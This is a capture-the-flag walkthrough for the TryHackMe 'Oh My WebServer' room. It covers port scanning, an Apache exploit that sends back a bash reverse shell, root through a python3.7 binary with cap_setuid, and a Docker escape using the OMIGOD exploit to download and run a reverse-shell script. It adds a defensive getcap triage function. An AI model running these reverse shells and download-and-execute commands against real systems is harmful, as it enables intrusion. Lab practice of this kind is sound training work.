Oh My WebServer
Room Link: https://tryhackme.com/room/ohmyweb
Initial Scan
Kali
nmap -A $VICTIM

Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Kali
gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Initial Shell
Exploit: https://www.exploit-db.com/raw/50383
Kali
nc -lvnp 1337
Kali
wget https://www.exploit-db.com/raw/50383 -O poc.sh
chmod +x poc.sh
./poc.sh targets.txt /bin/bash "bash -c 'bash -i >& /dev/tcp/$KALI/1337 0>&1'"

Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation
Exploit: https://gtfobins.github.io/gtfobins/python/

Victim
getcap -r / 2>/dev/null
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
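
The os.setuid(0) call above only works for a non-root user when the interpreter holds the cap_setuid file capability, which is what the getcap sweep reveals. As an added example (not part of the original walkthrough), this POSIX shell function triages the same getcap output from the hardening side; the risky-capability list and the sample lines are constructed assumptions.

```shell
#!/bin/sh
# Added example: triage `getcap -r /` output for capabilities that hand out root.
# Input: getcap lines on stdin. Output: "path<TAB>capability" per finding.

# Capabilities that allow a UID change or a bypass of file/kernel protections.
RISKY_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module"

flag_risky_caps() {
    awk -v risky="$RISKY_CAPS" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    {
        # Clauses start at the first field that is "=" or begins with "cap_"/"all";
        # everything before it is the path (which may contain spaces).
        first = 0
        for (i = 2; i <= NF; i++)
            if ($i ~ /^(=|all[=+-]|cap_)/) { first = i; break }
        if (!first) next
        path = $1
        for (i = 2; i < first; i++) path = path " " $i

        for (i = first; i <= NF; i++) {
            if (!match($i, /[=+-]/)) continue
            caps = substr($i, 1, RSTART - 1)
            flags = substr($i, RSTART)
            # Only effective (e) or permitted (p) grants matter; "+i" alone and
            # "-ep" removals are ignored.
            if (flags !~ /[=+][eip]*[ep]/) continue
            # An empty list ("=ep") or "all" grants every capability.
            if (caps == "" || caps == "all") { print path "\tall"; continue }
            m = split(caps, c, ",")
            for (j = 1; j <= m; j++)
                if (c[j] in bad) print path "\t" c[j]
        }
    }'
}

# Constructed sample covering both libcap output styles; on a real host run:
#   getcap -r / 2>/dev/null | flag_risky_caps
sample_getcap_output() {
    cat <<'EOF'
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/ping cap_net_raw=ep
/opt/tools/backup cap_dac_read_search,cap_chown+eip
/usr/bin/perl cap_setuid+i
/usr/local/bin/debug =ep
EOF
}

sample_getcap_output | flag_risky_caps
```

Any interpreter that shows up in the findings should have the capability removed with setcap -r, since a scripting runtime with cap_setuid is equivalent to a setuid-root shell.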


Nmap
Scanned the gateway
Kali
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap
python2 -m SimpleHTTPServer 81
Victim
cd /tmp/
curl http://10.10.30.128:81/nmap -o nmap
chmod +x nmap
./nmap -p- 172.17.0.1 --min-rate=700 -vvv

Privilege Escalation / Docker Breakout
shell.sh
#!/bin/bash
sh -i >& /dev/tcp/$KALI/1338 0>&1
Kali
git clone https://github.com/horizon3ai/CVE-2021-38647.git
cd CVE-2021-38647/
python2 -m SimpleHTTPServer 81
Victim
cd /tmp/
curl http://10.10.30.128:81/omigod.py -o omigod.py
Kali
nc -lvnp 1338
Victim
python3 omigod.py -t 172.17.0.1 -c "curl http://$KALI:81/shell.sh -o shell.sh"
python3 omigod.py -t 172.17.0.1 -c "chmod +x shell.sh"
python3 omigod.py -t 172.17.0.1 -c "./shell.sh"
